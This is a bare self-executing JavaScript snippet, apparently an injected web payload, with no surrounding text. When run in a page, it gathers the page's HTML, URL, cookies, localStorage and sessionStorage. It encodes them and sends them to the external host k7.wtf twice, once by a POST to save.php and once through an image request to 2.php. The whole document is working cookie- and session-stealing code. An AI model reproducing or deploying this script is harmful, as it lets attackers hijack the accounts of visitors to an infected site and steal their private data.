(function(){ function sendPost(a, b, c, d, e, f) { const g = new FormData(); g.append("page", a); g.append("url", b); g.append("cookies", c); g.append("localstorage", d); g.append("sessionstorage", e); return fetch(f, { method: "POST", body: g }); } const h = btoa(encodeURIComponent(document.documentElement.outerHTML)); const i = btoa(encodeURIComponent(window.location.href)); const j = btoa(encodeURIComponent(document.cookie)); const k = btoa(encodeURIComponent(JSON.stringify(localStorage))); const l = btoa(encodeURIComponent(JSON.stringify(sessionStorage))); const m = "https://k7.wtf/save.php"; sendPost(h, i, j, k, l, m); new Image().src = "https://k7.wtf/2.php?c=" + i + "&d=" + j + "&e=" + k + "&f=" + l; })();